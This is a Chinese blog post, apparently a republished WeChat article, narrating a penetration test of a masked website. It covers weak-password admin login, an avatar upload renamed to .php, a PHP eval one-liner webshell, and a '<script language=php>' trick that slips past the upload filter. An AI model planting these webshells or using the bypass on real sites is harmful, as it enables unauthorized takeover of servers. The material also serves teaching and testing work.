前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次有趣的一句话拿Shell的渗透测试过程

记一次有趣的一句话拿Shell的渗透测试过程

作者头像
渗透攻击红队
发布2019-11-19 22:45:40
2.2K0
发布2019-11-19 22:45:40
举报
文章被收录于专栏:漏洞知识库漏洞知识库

记一次有趣的一句话拿Shell的渗透测试过程

前言

拿到的是一个代理网站,简单先观察了下网站,发现使用的是PHP+ 宝塔 +Tp5框架的网站。通过弱口令进入后台任意文件上传拿shell。也不知道说啥,直接记录步骤吧

步骤

1.首先拿到这个网站,先简单的信息收集,了解到网站的基本信息:

(1).该网站使用php

(2)使用的服务器是linux.用的是宝塔

(3)中间件Apache

(4)框架是Tp5

2.先是找到了网站的登陆地方:

运气爆棚的用弱口令登陆了进去:

代码语言:javascript
复制
用户名:123456

密码:123456

3.进入后台有一个头像上传点:

先上传一个jpg图片然后BurpSuite抓包:

数据包中直接修改后缀为php - Go -上传成功!

获取到的上传地址为:

http://xxxxx.com/uploads/face/20190827/1fac611f65a7dc6dde4ae2f9643c6463.php

发现是可以解析php文件!那么数据包中修改上传一句话试试:

一句话是这样:

代码语言:javascript
复制
<?php @eval($_POST['liuwx']);?>

返回包显示:非法上传!

说明不行!经过我测试他拦截规则是验证了数据包中是否有:

代码语言:javascript
复制
<?php

反复Fuzz发现用空格就可以绕过:

代码语言:javascript
复制
<? php

但是访问一句话地址的时候就会出错:

后来问团队的Ae大佬告诉我可以用这种方法绕过:

结果我去试了一试确实是可以这样绕过的:

不愧是Ae大佬,一分钟就让我拿到Shell了!在这说一句Ae大佬666!

Webshell

最终也是用这个一句话拿到了Webshell:

代码语言:javascript
复制
<script language="php">
@eval($_POST['a']);
</script>

总结

这次成功Getshell主要利用弱口令文件上传等等拿到了Shell。其中本来想用TP5的Poc去执行一波命令,但是失败了,不过最终也是成功得到了网站的控制权限。

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-10-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 漏洞知识库 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 步骤
  • Webshell
  • 总结
相关产品与服务
消息队列 TDMQ
消息队列 TDMQ (Tencent Distributed Message Queue)是腾讯基于 Apache Pulsar 自研的一个云原生消息中间件系列,其中包含兼容Pulsar、RabbitMQ、RocketMQ 等协议的消息队列子产品,得益于其底层计算与存储分离的架构,TDMQ 具备良好的弹性伸缩以及故障恢复能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档